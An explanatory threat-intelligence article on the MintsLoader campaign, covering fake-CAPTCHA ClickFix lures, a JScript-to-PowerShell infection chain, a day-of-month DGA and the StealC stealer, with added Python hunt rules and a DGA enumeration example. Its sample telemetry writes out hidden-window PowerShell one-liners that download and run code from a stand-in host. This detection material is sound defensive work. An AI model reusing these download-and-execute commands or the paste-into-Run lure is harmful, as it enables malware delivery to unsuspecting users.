
MintsLoader Malware

Cybersecurity researchers have uncovered an active campaign built around a malware loader known as MintsLoader. This PowerShell-based loader has been used to deliver secondary payloads, including the StealC information stealer and BOINC, a legitimate open-source volunteer-computing platform that is abused here as a payload. Initial access comes through spam emails carrying either links to KongTuke or ClickFix pages or malicious JScript (.js) files. The campaign, detected in early January 2025, has primarily targeted the electricity, oil and gas, and legal services sectors in the United States and Europe.

Fake CAPTCHA Prompts: A Deceptive Entry Point

The campaign relies on a growing social-engineering trend: fake CAPTCHA verification prompts. These pages pose as routine human-verification checks and trick users into running a malicious PowerShell command themselves. In the KongTuke and ClickFix variants, the page silently writes the command to the victim's clipboard and then instructs them to open the Windows Run dialog (Win+R), paste, and press Enter. No browser or operating-system vulnerability is exploited; the victim performs the first stage of the intrusion by hand, which is why the technique bypasses browser sandboxing entirely.

How KongTuke Injects Fraudulent Scripts

KongTuke works by injecting a script into compromised websites so that they display a counterfeit "verify you are human" page. When a visitor interacts with the page, a malicious PowerShell command is silently copied to their clipboard, and the page shows step-by-step instructions for pasting and executing it. The attack needs nothing more than a cooperative user, which makes it both simple and effective. A related campaign distributing BOINC through the same lure shows how widespread the technique has become.

MintsLoader’s Sophisticated Infection Chain

MintsLoader's attack chain begins with a link delivered through spam email. When clicked, the link downloads an obfuscated JScript (.js) file, which the Windows Script Host executes. The script launches a PowerShell command that downloads MintsLoader with curl, runs it, and then deletes the JScript file to reduce the forensic footprint. In the alternative path, the victim is redirected to a ClickFix-style page and prompted to paste and execute the command in the Windows Run dialog. Both paths end in the same place: a PowerShell process fetching the loader over HTTP.
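Both entry paths leave a recognisable parent/child trace in process-creation telemetry: the Run-dialog paste produces powershell.exe with explorer.exe as its parent and a hidden-window or download one-liner, while the JScript path produces wscript.exe running a .js from a user directory and then spawning powershell.exe. The following hunt rules, written here as an added example and not code from the original page or from the researchers who analysed MintsLoader, run over a handful of constructed process-creation records. The field names (image, parent image, command line) mirror Sysmon Event ID 1 but are an assumption about how a given SIEM exports them; the sample command lines and the example.invalid host are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style; field names assumed)."""
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Markers that separate a pasted downloader one-liner from an interactive console:
# hidden window, policy bypass, encoded command, download cmdlets, curl, or a URL.
SUSPICIOUS_PS = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|"
    r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|"
    r"\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring|"
    r"\bcurl(?:\.exe)?\b|https?://)",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(?:downloads|temp|appdata)\\", re.IGNORECASE)
JS_EXT = re.compile(r"\.jse?\b", re.IGNORECASE)


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every hunt rule the event matches (empty list if benign)."""
    hits: List[str] = []
    img, parent = _basename(ev.image), _basename(ev.parent_image)
    is_ps = img in {"powershell.exe", "pwsh.exe"}
    # ClickFix / KongTuke: the victim pastes into Win+R, so explorer.exe is the parent
    # and the command line carries hidden-window / download / iex markers.
    if is_ps and parent == "explorer.exe" and SUSPICIOUS_PS.search(ev.command_line):
        hits.append("clickfix-run-dialog")
    # JScript lure: the .js runs under wscript/cscript, which then spawns PowerShell.
    if is_ps and parent in SCRIPT_HOSTS:
        hits.append("script-host-spawned-powershell")
    # The lure itself: a script host executing a .js/.jse from a user-writable path.
    if img in SCRIPT_HOSTS and JS_EXT.search(ev.command_line) and USER_WRITABLE.search(ev.command_line):
        hits.append("js-lure-from-user-dir")
    return hits


def hunt(events) -> List[Tuple[int, str]]:
    """Flatten rule hits into (pid, rule) pairs, in event order."""
    return [(ev.pid, rule) for ev in events for rule in classify(ev)]


# Constructed sample telemetry: one benign console launch plus both MintsLoader entry paths.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    # Benign: an admin opens PowerShell from the Start menu (explorer parent, no markers).
    ProcEvent(101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'),
    # ClickFix path: the clipboard payload pasted into the Run dialog.
    ProcEvent(102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"'),
    # JScript path: the .js lure from Downloads, then PowerShell pulling the loader with curl.
    ProcEvent(103, r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
              r'wscript.exe "C:\Users\u\Downloads\invoice.js"'),
    ProcEvent(104, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\wscript.exe",
              'powershell -c "curl.exe -o %TEMP%\\a.ps1 http://example.invalid/a.ps1; & %TEMP%\\a.ps1"'),
]

if __name__ == "__main__":
    for pid, rule in hunt(SAMPLE_EVENTS):
        print(pid, rule)
```

The explorer.exe rule deliberately requires a download or evasion marker in the command line; PowerShell started from the Start menu also has explorer.exe as its parent, and flagging every such launch would bury the real ClickFix events in noise.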

Once running, MintsLoader contacts a command-and-control (C2) server to fetch the next stage. These intermediate PowerShell scripts perform environment checks to detect sandboxes and analysis tools before anything of value is dropped. The loader also uses a Domain Generation Algorithm (DGA) that derives the C2 domain from a seed value combined with the current day of the month. The practical consequence is that the expected domain changes daily but cycles every month, so a defender who recovers the seed from a sample can enumerate every candidate domain in advance.
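The defensive side of a day-of-month DGA is that its reachable set is tiny: one seed yields at most 31 names. The block below, an added illustration rather than MintsLoader's actual algorithm, uses a hypothetical construction (SHA-256 over seed plus day, encoded into a lowercase label with an assumed .top TLD) to show the generator, a defender-side enumeration of the month's candidates, and a match of those candidates against a constructed DNS query list. The hash, alphabet, label length and TLD are all assumptions chosen for the example.

```python
import hashlib
from datetime import date
from typing import Iterable, List, Optional, Set

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
TLD = ".top"  # assumption for the example; not taken from the real loader


def dga_domain(seed: int, day_of_month: int, length: int = 12) -> str:
    """Illustrative DGA: mix the seed with the day of the month, hash, encode.

    This is a stand-in for the real MintsLoader routine, which only shares the
    'seed + day of month' input described in the text.
    """
    if not 1 <= day_of_month <= 31:
        raise ValueError("day_of_month must be in 1..31")
    material = (seed + day_of_month).to_bytes(8, "little")
    digest = hashlib.sha256(material).digest()
    label = "".join(ALPHABET[b % len(ALPHABET)] for b in digest[:length])
    return label + TLD


def todays_domain(seed: int, today: Optional[date] = None) -> str:
    """What the implant would contact on a given date (defaults to today)."""
    d = today or date.today()
    return dga_domain(seed, d.day)


def monthly_candidates(seed: int) -> Set[str]:
    """Defender side: the whole reachable set for one seed is at most 31 names."""
    return {dga_domain(seed, day) for day in range(1, 32)}


def match_dns_log(seed: int, queried_names: Iterable[str]) -> List[str]:
    """Return queried names that fall inside the seed's candidate set."""
    candidates = monthly_candidates(seed)
    return [q for q in queried_names if q.lower().rstrip(".") in candidates]


# Constructed seed and DNS query list for the demonstration.
DEMO_SEED = 0xC0FFEE
DEMO_QUERIES = [
    "login.microsoftonline.com",
    dga_domain(DEMO_SEED, 7),     # the day-7 C2 candidate, as it would appear in resolver logs
    "updates.example.invalid.",   # trailing dot: a fully qualified name from a resolver log
]

if __name__ == "__main__":
    print("today:", todays_domain(DEMO_SEED))
    print("monthly blocklist size:", len(monthly_candidates(DEMO_SEED)))
    print("hits:", match_dns_log(DEMO_SEED, DEMO_QUERIES))
```

Because the day of the month is the only time input, 1 January and 1 February resolve to the same domain; the enumeration therefore produces a blocklist that stays valid indefinitely for that seed, unlike DGAs keyed on the full date.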

StealC: A Powerful Payload with Regional Exclusions

The campaign culminates in the deployment of StealC, an information stealer sold on the Malware-as-a-Service (MaaS) market since early 2023 and likely a re-engineered variant of the Arkei stealer. Beyond its evasion techniques, one notable feature is a geographic exclusion: StealC refuses to run on systems located in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan. Such exclusions suggest constraints on where the operators are willing to cause infections rather than any technical limitation.

Rising Threats and User Vigilance

The discovery of MintsLoader and its associated campaigns underscores how much can be achieved without exploiting a single software vulnerability: fake CAPTCHA prompts turn the victim into the initial execution mechanism, and a multi-stage PowerShell chain with sandbox checks and a DGA handles the rest. User awareness of the paste-into-Run lure is a necessary defense, but it is not sufficient. Defenders should also watch process telemetry for powershell.exe launched by explorer.exe with hidden-window or download arguments (the Run-dialog paste) or by wscript.exe (the JScript path), and should treat the day-of-month DGA as an opportunity, since its small candidate space can be enumerated and blocked once the seed is recovered from a sample.
